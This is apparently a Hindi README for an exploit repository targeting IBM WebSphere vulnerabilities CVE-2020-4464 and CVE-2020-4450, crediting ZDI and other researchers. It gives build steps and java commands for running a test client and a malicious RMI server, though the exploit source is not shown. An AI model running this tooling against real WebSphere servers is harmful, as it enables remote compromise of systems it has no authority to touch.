
CVE-2020-4464 / CVE-2020-4450
यह ZDI के उत्कृष्ट ब्लॉग पोस्ट पर आधारित है (मूल रिपोर्ट @_tint0 द्वारा):
... और कुछ अच्छे चीनी हैकर्स के काम पर (मैं कोड का वास्तविक स्रोत निर्धारित नहीं कर सका, यदि आपको लगता है कि आप क्रेडिट के हकदार हैं तो एक Issue खोलने में संकोच न करें):
मेरे अतिरिक्त (वास्तव में ज्यादा नहीं):
FoxGlove का कोड को एक सबमॉड्यूल के रूप में शामिल किया गया है, आप CVE-2020-4464 को ट्रिगर करने के लिए WebSphere अनुरोध फ़ाइल का उपयोग कर सकते हैं।
आपको plugins और runtimes निर्देशिकाओं को WebSphere से lib निर्देशिका में कॉपी करना चाहिए, फिर संकलित करने के लिए चलाएँ!
antचलाने के लिए (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer